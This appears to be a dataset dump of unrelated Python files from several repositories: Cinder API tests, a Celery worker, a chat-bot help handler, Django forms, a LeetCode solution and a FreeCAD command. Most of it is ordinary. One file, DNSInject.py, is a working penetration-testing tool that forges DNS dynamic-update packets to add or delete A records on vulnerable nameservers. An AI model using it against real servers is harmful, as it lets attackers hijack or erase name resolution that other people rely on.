fixture = 'http://www.testsite.com/v1.1/images'
expected = 'http://www.testsite.com/images'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_2(self):
fixture = 'http://www.testsite.com/v1.1/'
expected = 'http://www.testsite.com/'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_3(self):
fixture = 'http://www.testsite.com/v10.10'
expected = 'http://www.testsite.com'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_4(self):
fixture = 'http://www.testsite.com/v1.1/images/v10.5'
expected = 'http://www.testsite.com/images/v10.5'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_bad_request(self):
fixture = 'http://www.testsite.com/1.1/images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
def test_remove_version_from_href_bad_request_2(self):
fixture = 'http://www.testsite.com/v/images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
def test_remove_version_from_href_bad_request_3(self):
fixture = 'http://www.testsite.com/v1.1images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
class TestCollectionLinks(test.TestCase):
"""Tests the _get_collection_links method."""
def _validate_next_link(self, href_link_mock, item_count,
osapi_max_limit, limit, should_link_exist):
req = mock.MagicMock()
href_link_mock.return_value = [{"rel": "next",
"href": "fake_link"}]
self.flags(osapi_max_limit=osapi_max_limit)
if limit is None:
params = mock.PropertyMock(return_value=dict())
limited_list_size = min(item_count, osapi_max_limit)
else:
params = mock.PropertyMock(return_value=dict(limit=limit))
limited_list_size = min(item_count, osapi_max_limit,
limit)
limited_list = [{"uuid": str(i)} for i in range(limited_list_size)]
type(req).params = params
builder = common.ViewBuilder()
results = builder._get_collection_links(req, limited_list,
mock.sentinel.coll_key,
item_count, "uuid")
if should_link_exist:
href_link_mock.assert_called_once_with(limited_list, "uuid",
req,
mock.sentinel.coll_key)
self.assertThat(results, matchers.HasLength(1))
else:
self.assertFalse(href_link_mock.called)
self.assertThat(results, matchers.HasLength(0))
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_equals_osapi_max_no_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 5
limit = None
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_equals_osapi_max_greater_than_limit(self,
href_link_mock):
item_count = 5
osapi_max_limit = 5
limit = 4
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_equals_osapi_max_equals_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 5
limit = 5
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_equals_osapi_max_less_than_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 5
limit = 6
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_less_than_osapi_max_no_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = None
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_limit_less_than_items_less_than_osapi_max(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = 4
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_limit_equals_items_less_than_osapi_max(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = 5
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_less_than_limit_less_than_osapi_max(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = 6
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_less_than_osapi_max_equals_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = 7
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_less_than_osapi_max_less_than_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = 8
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_greater_than_osapi_max_no_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = None
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_limit_less_than_items_greater_than_osapi_max(self,
href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = 2
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_greater_than_osapi_max_equals_limit(self,
href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = 3
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_greater_than_limit_greater_than_osapi_max(self,
href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = 4
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_equals_limit_greater_than_osapi_max(self,
href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = 5
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_limit_greater_than_items_greater_than_osapi_max(self,
href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = 6
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
class LinkPrefixTest(test.TestCase):
def test_update_link_prefix(self):
vb = common.ViewBuilder()
result = vb._update_link_prefix("http://192.168.0.243:24/",
"http://127.0.0.1/volume")
self.assertEqual("http://127.0.0.1/volume", result)
result = vb._update_link_prefix("http://foo.x.com/v1",
"http://new.prefix.com")
self.assertEqual("http://new.prefix.com/v1", result)
result = vb._update_link_prefix(
"http://foo.x.com/v1",
"http://new.prefix.com:20455/new_extra_prefix")
self.assertEqual("http://new.prefix.com:20455/new_extra_prefix/v1",
result)
|
CloudServer/cinder
|
cinder/tests/unit/api/test_common.py
|
Python
|
apache-2.0
| 24,477 | 0 |
# -*-coding: utf-8-*-
from celery import Celery
from op import utils
import celeryconfig
worker = Celery('Regular-Ticket-Task')
worker.config_from_object(celeryconfig)
worker.conf.BROKER_URL = utils.get_config('celery', 'BROKER_URL')
worker.conf.CELERY_RESULT_BACKEND = utils.get_config('celery', 'CELERY_RESULT_BACKEND')
|
EthanGuo/regular-ticket-task
|
worker.py
|
Python
|
mit
| 325 | 0.003077 |
#!/usr/bin/env python
# -*- coding: utf8 -*-
#~#######################################################################
#~ Copyright (c) 2008 Burdakov Daniel <kreved@kreved.org> #
#~ #
#~ This file is part of FreQ-bot. #
#~ #
#~ FreQ-bot is free software: you can redistribute it and/or modify #
#~ it under the terms of the GNU General Public License as published by #
#~ the Free Software Foundation, either version 3 of the License, or #
#~ (at your option) any later version. #
#~ #
#~ FreQ-bot is distributed in the hope that it will be useful, #
#~ but WITHOUT ANY WARRANTY; without even the implied warranty of #
#~ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
#~ GNU General Public License for more details. #
#~ #
#~ You should have received a copy of the GNU General Public License #
#~ along with FreQ-bot. If not, see <http://www.gnu.org/licenses/>. #
#~#######################################################################
def help_handler(t, s, p):
p = p.strip()
q = re.search('^(\-..\ )?\.?(.+)$', p)
if q:
rlang = q.groups()[0]
if rlang: rlang = rlang[1:3]
else: rlang = lang.getLang(s.jid)
p = q.groups()[1]
if p.startswith('.'): p = p[1:]
else:
rlang = lang.getLang(s.jid)
p = ''
if p:
if p.startswith('.'): p = p[1:]
if p in HELP_CATEGORIES:
answer = HELP_CATEGORIES[p]
answer.sort()
answer = ', '.join(answer)
s.lmsg(t, 'help_category', answer)
else:
if p in HELP_LANGS:
q = HELP_LANGS[p]
if rlang in q:
content = load_help_content(p, rlang)
categories = ', '.join([w for w in HELP_CATEGORIES.keys() if p in HELP_CATEGORIES[w]])
s.lmsg(t, 'help_show', categories, content)
else:
languages = HELP_LANGS[p]
languages = ["'.help -%s %s'" % (w, p) for w in languages]
s.lmsg(t, 'help_other_languages', p, rlang, ', '.join(languages))
else: s.lmsg(t, 'help_not_found', p)
else:
ans = ['%s(%s)' % (w, len(HELP_CATEGORIES[w])) for w in HELP_CATEGORIES.keys()]
ans.sort()
categories = ', '.join(ans)
s.lmsg(t, 'help_categories', categories)
bot.register_cmd_handler(help_handler, '.help')
bot.register_cmd_handler(help_handler, 'help')
|
TLemur/freq-bot
|
src/plugins/help/help_handler.py
|
Python
|
gpl-3.0
| 2,586 | 0.023975 |
#!/usr/bin/env python
# by Chris Truncer
# Script to attempt to forge a packet that will inject a new value
# for a dns record. Check nessus plugin #35372
# Some great documentation and sample code came from:
# http://bb.secdev.org/scapy/src/46e0b3e619547631d704c133a0247cf4683c0784/scapy/layers/dns.py
import argparse
import logging
# I know it's bad practice to add code up here, but it's the only way I could
# see to suppress the IPv6 warning from scapy (By setting this
# before importing scapy).
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import os
from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1
import sys
def add_a_record(name_server, new_dns_record, ip_value):
os.system('clear')
title()
# Verifying all required options have a populated value
if name_server is None or new_dns_record is None or ip_value is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record injection..."
print "[*] Sending DNS packet adding " + new_dns_record
print "[*] and pointing it to " + ip_value + "\n"
dns_zone = new_dns_record[new_dns_record.find(".")+1:]
# Craft the packet with scapy
add_packet = sr1(IP(dst=name_server)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=new_dns_record,
type="A", ttl=120, rdata=ip_value)]))
print add_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def cli_parser():
# Command line argument parser
parser = argparse.ArgumentParser(
add_help=False,
description="DNSInject is a tool for modifying DNS records on vulnerable servers.")
parser.add_argument(
"--add", action='store_true',
help="Add \"A\" record to the vulnerable name server.")
parser.add_argument(
"--delete", action='store_true',
help="Delete \"A\" record from the vulnerable name server.")
parser.add_argument(
"-ns", metavar="ns1.test.com",
help="Nameserver to execute the specified action.")
parser.add_argument(
"-d", metavar="mynewarecord.test.com",
help="Domain name to create an A record for.")
parser.add_argument(
"-ip", metavar="192.168.1.1",
help="IP Address the new record will point to.")
parser.add_argument(
'-h', '-?', '--h', '-help', '--help', action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.h:
parser.print_help()
sys.exit()
return args.add, args.delete, args.ns, args.d, args.ip
def delete_dns_record(del_ns, del_record):
os.system('clear')
title()
# Verifying all required options have a populated value
if del_ns is None or del_record is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record deletion..."
print "[*] Sending packet which deletes the following record: "
print "[*] " + del_record + "\n"
dns_zone = del_record[del_record.find(".")+1:]
del_packet = sr1(IP(dst=del_ns)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=del_record, type="ALL",
rclass="ANY", ttl=0, rdata="")]))
print del_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def title():
print "######################################################################"
print "# DNS Injector #"
print "######################################################################\n"
return
if __name__ == '__main__':
# Parse command line arguments
action_add, action_delete, dns_nameserver, dns_record, dns_ip = cli_parser()
#Chose function based on action variable value
try:
if action_add:
add_a_record(dns_nameserver, dns_record, dns_ip)
elif action_delete:
delete_dns_record(dns_nameserver, dns_record)
else:
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
sys.exit()
except AttributeError:
os.system('clear')
title()
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
|
ChrisTruncer/PenTestScripts
|
HostScripts/DNSInject.py
|
Python
|
gpl-3.0
| 4,615 | 0.002384 |
from django import forms
from empresas.models import Usuario, Pessoa, Empresa
class LoginForm(forms.Form):
username = forms.CharField(max_length='200', required=True)
password = forms.CharField(widget=forms.PasswordInput, required=True)
class UsuarioForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput)
class Meta:
model = Usuario
class PessoaForm(forms.ModelForm):
class Meta:
model = Pessoa
class EmpresaForm(forms.ModelForm):
class Meta:
model = Empresa
|
mateusportal/portalconta
|
empresas/forms.py
|
Python
|
gpl-2.0
| 537 | 0.007449 |
__source__ = ''
# https://github.com/kamyu104/LeetCode/blob/master/Python/convert-a-number-to-hexadecimal.py
# Time: O(logn)
# Space: O(1)
#
# Description:
#
# Given an integer, write an algorithm to convert it to hexadecimal.
# For negative integer, two's complement method is used.
#
# IMPORTANT:
# You must not use any method provided by the library which converts/formats
# the number to hex directly. Such solution will result in disqualification of
# all your submissions to this problem. Users may report such solutions after the
# contest ends and we reserve the right of final decision and interpretation
# in the case of reported solutions.
#
# Note:
#
# All letters in hexadecimal (a-f) must be in lowercase.
# The hexadecimal string must not contain extra leading 0s. If the number is zero,
# it is represented by a single zero character '0'; otherwise,
# the first character in the hexadecimal string will not be the zero character.
# The given number is guaranteed to fit within the range of a 32-bit signed integer.
# You must not use any method provided by the library which converts/formats the number to hex directly.
# Example 1:
#
# Input:
# 26
#
# Output:
# "1a"
# Example 2:
#
# Input:
# -1
#
# Output:
# "ffffffff"
# Bit Manipulation
import unittest
# 20ms 98.60%
class Solution(object):
def toHex(self, num):
return ''.join('0123456789abcdef'[(num >> 4 * i) & 15]
for i in range(8)
)[::-1].lstrip('0') or '0'
def toHex2(self, num):
"""
:type num: int
:rtype: str
"""
if not num:
return "0"
res = []
while num and len(res) != 8:
h = num & 15
if h < 10:
res.append(str(chr(ord('0') + h)))
else:
res.append(str(chr(ord('a') + h - 10)))
num >>= 4
res.reverse()
return "".join(res)
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# https://ratchapong.com/algorithm-practice/leetcode/convert-a-number-to-hexadecimal
# Thought: each time we take a look at the last four digits of
binary verion of the input, and maps that to a hex char
shift the input to the right by 4 bits, do it again
until input becomes 0.
# 3ms 100%
class Solution {
public String toHex(int num) {
if (num == 0) return "0";
char[] map = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
StringBuilder sb = new StringBuilder();
while (num != 0) {
sb.insert(0, map[num & 0b1111]);
num = num >>> 4;
}
return sb.toString();
}
}
Worst Case
O(logb(n)) : With respect to the input, the algorithm will always depend on the size of input.
The extra space is needed to store the equivalent string of base 16
Approach: Shifting and Masking
Number is masked against binary of 1111 each time to get the component value
which is then mapped to corresponding character. >>> is used to right-shifted
4
4 bit positions with zero-extension. The zero-extension will naturally deal with negative number.
StringBuilder is used due to its efficiently in inserting character to existing StringBuilder object.
If normal String is used then each insertion by + operation
will have to copy over the immutable String object which is highly inefficient.
For Integer.MAX_VALUE or Integer.MIN_VALUE or any input
with 8 Hexadecimal characters where the iterations would last the longest.
For Integer.MAX_VALUE the algorithm will run for at most log base16 (2^31 - 1) +1 = 8 times
# 3ms 100%
class Solution {
public String toHex(int num) {
long n = num & 0x00000000ffffffffL;
char[] map = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
StringBuilder sb = new StringBuilder();
while (n > 0) {
sb.insert(0, map[(int) (n % 16)]);
n = n / 16;
}
return num == 0 ? "0" : sb.toString();
}
}
Worst Case
O(logb(n)) : With respect to the input, the algorithm will always depend on the size of input.
The extra space is needed to store the equivalent string of base 16.
Approach: Divide and Modding
To deal with negative number, the number is masked against long data type.
This process will convert it to a positive long number.
A simple while loop is then use to extract each base digit until number becomes 0.
'''
|
JulyKikuAkita/PythonPrac
|
cs15211/ConvertANumberToHexadecimal.py
|
Python
|
apache-2.0
| 4,592 | 0.004138 |
# ***************************************************************************
# * *
# * Copyright (c) 2013-2015 - Juergen Riegel <FreeCAD@juergen-riegel.net> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
__title__ = "Command Mesh Netgen From Shape"
__author__ = "Juergen Riegel"
__url__ = "http://www.freecadweb.org"
## @package CommandFemMeshNetgenFromShape
# \ingroup FEM
import FreeCAD
from FemCommands import FemCommands
import FreeCADGui
import FemGui
from PySide import QtCore
class _CommandFemMeshNetgenFromShape(FemCommands):
# the FEM_MeshNetgenFromShape command definition
def __init__(self):
super(_CommandFemMeshNetgenFromShape, self).__init__()
self.resources = {'Pixmap': 'fem-femmesh-netgen-from-shape',
'MenuText': QtCore.QT_TRANSLATE_NOOP("FEM_MeshFromShape", "FEM mesh from shape by Netgen"),
'ToolTip': QtCore.QT_TRANSLATE_NOOP("FEM_MeshFromShape", "Create a FEM volume mesh from a solid or face shape by Netgen internal mesher")}
self.is_active = 'with_part_feature'
def Activated(self):
FreeCAD.ActiveDocument.openTransaction("Create FEM mesh Netgen")
FreeCADGui.addModule("FemGui")
sel = FreeCADGui.Selection.getSelection()
if (len(sel) == 1):
if(sel[0].isDerivedFrom("Part::Feature")):
FreeCADGui.doCommand("App.activeDocument().addObject('Fem::FemMeshShapeNetgenObject', '" + sel[0].Name + "_Mesh')")
FreeCADGui.doCommand("App.activeDocument().ActiveObject.Shape = App.activeDocument()." + sel[0].Name)
if FemGui.getActiveAnalysis():
FreeCADGui.addModule("FemGui")
FreeCADGui.doCommand("FemGui.getActiveAnalysis().Member = FemGui.getActiveAnalysis().Member + [App.ActiveDocument.ActiveObject]")
FreeCADGui.doCommand("Gui.activeDocument().setEdit(App.ActiveDocument.ActiveObject.Name)")
FreeCADGui.Selection.clearSelection()
FreeCADGui.addCommand('FEM_MeshNetgenFromShape', _CommandFemMeshNetgenFromShape())
|
bblacey/FreeCAD-MacOS-CI
|
src/Mod/Fem/PyGui/_CommandFemMeshNetgenFromShape.py
|
Python
|
lgpl-2.1
| 3,519 | 0.002273 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.